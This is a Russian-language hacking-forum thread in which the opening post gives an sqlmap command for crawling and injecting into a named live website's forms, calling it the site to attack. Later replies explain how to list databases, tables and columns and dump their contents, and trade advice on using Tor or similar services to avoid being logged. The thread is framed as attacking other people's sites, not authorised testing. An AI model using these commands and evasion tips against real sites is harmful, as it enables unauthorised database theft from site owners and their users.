Загрузка...

Авторская статья Поиск уязвимостей с помощью SQLMap

Тема в разделе Веб уязвимости создана пользователем Dope_inactive33786 24 май 2016. 11 780 просмотров

Загрузка...
Сортировать
  1. Dope_inactive33786
    Кому понравилось (7) Скопировать BBCode
    Dope_inactive33786 Автор темы 24 май 2016 Заблокирован(а) 265 11 фев 2016
    Прописываем в SQLMap следующее:
    Код
    sqlmap.py --random-agent -u lolzteam.org --form --crawl=2 --batch
    , где
    --crawl=2 <- сканирование структуры сайта
    --batch <- Автоматизация процесса, впредь до конца атаки
    --random-agent = рандомный юзер агент
    site.org <- сайт, на который мы будем совершать атаку
    Думаю суть вы поняли, конкретно мои настройки выглядят примерно так:

    , но вы юзайте как вам удобно, основу я дал.
     
    24 май 2016
  2. 13loodislav
    Скопировать BBCode
    13loodislav 3 июн 2016 0 3 июн 2016
    Спасибо
     
    3 июн 2016
  3. hybridminds
    Скопировать BBCode
    hybridminds 14 июн 2016 0 12 июн 2016
    Можно спросить что дальше делать, когда дочекает сайтик ?)
     
    14 июн 2016
  4. mohands
    Скопировать BBCode
    mohands 20 июн 2016 0 12 июн 2016
    thanks r sharing this
     
    20 июн 2016
  5. RaysMorgan
    Скопировать BBCode
    RaysMorgan 20 июн 2016 https://lolz.live/support-tickets/open 51 794 7 мар 2013
    20 июн 2016
  6. Dwein
    Скопировать BBCode
    Dwein 21 июн 2016 11 25 фев 2016
    найс статья
     
    21 июн 2016
  7. hybridminds
    Скопировать BBCode
    hybridminds 23 июн 2016 0 12 июн 2016
    23 июн 2016
  8. Ilyas_inactive33509
    Кому понравилось (1) Скопировать BBCode
    Ilyas_inactive33509 18 авг 2016 Заблокирован(а) 83 7 фев 2016
    18 авг 2016
  9. Danilo_7767808
    Скопировать BBCode
    Danilo_7767808 10 ноя 2016 26 24 май 2016
    Спасибо
     
    10 ноя 2016
  10. NiceGood
    Скопировать BBCode
    NiceGood 11 янв 2017 1 11 дек 2016
    ****** еще нужны?
     
    11 янв 2017
  11. ТипаЕллиот
    Скопировать BBCode
    ТипаЕллиот 13 фев 2017 17 21 окт 2016
    NiceGood, ****** при сканировании сайта не нужны,ибо обычно система ничего не палит. Но если проводить инжект через sqlmap,то бот начнёт сеять панику и запишет твой IP в ****)
    Атаку с sqlmap можно провести и с помощью Tor)
     
    13 фев 2017
  12. what7up
    Скопировать BBCode
    what7up 27 фев 2017 Заблокирован(а) 43 25 дек 2016
    А если пользоваться ***'ом то все норм будет?
     
    27 фев 2017
  13. ТипаЕллиот
    Скопировать BBCode
    ТипаЕллиот 27 фев 2017 17 21 окт 2016
    @what7up,А чем Tor отличается от ***?
     
    27 фев 2017
  14. MavRikoZ
    Скопировать BBCode
    MavRikoZ 28 фев 2017 0 14 фев 2017
    Может тем что Tor подключается к цепочке серверов, а подключаясь к *** ты подключаешься к одному серверу
     
    28 фев 2017
  15. ТипаЕллиот
    Скопировать BBCode
    ТипаЕллиот 28 фев 2017 17 21 окт 2016
    Господи.Я знаю... Сударь,вы не понимаете сарказма.
     
    28 фев 2017
  16. dramzar_inactive140430
    Скопировать BBCode
    dramzar_inactive140430 12 июл 2017 Заблокирован(а) 56 10 июл 2017
    Очень пригодилось,спасибо!
     
    12 июл 2017
  17. romcka1987
    Скопировать BBCode
    romcka1987 3 сен 2017 4 1 сен 2017
    А как потом раскручивать уязвимость? Мануалы есть подробные? Что сайт уязвим, можно и без sqlmap узнать.
     
    3 сен 2017
  18. sourse21
    Скопировать BBCode
    sourse21 3 сен 2017 В поиске приклюнений... 10 5 июн 2017
    На нормальных сайтах не узнаешь.
    Что раскручивать??? приписываешь:
    1." --dbs " список баз данных
    2."-D Назв_базы --tables"
    3."-D Назв_базы -T Назв_таблицы --colums "
    4."-D Назв_базы -T Назв_таблицы -C Назв_колноки1, Назв_колонкиN --dump"
     
    3 сен 2017
  19. romcka1987
    Скопировать BBCode
    romcka1987 3 сен 2017 4 1 сен 2017
    Спасибо, будем тестировать.
     
    3 сен 2017
  20. Checkerchin
    Скопировать BBCode
    Checkerchin 23 ноя 2017 178 16 апр 2017
    Помогло
     
    23 ноя 2017
Top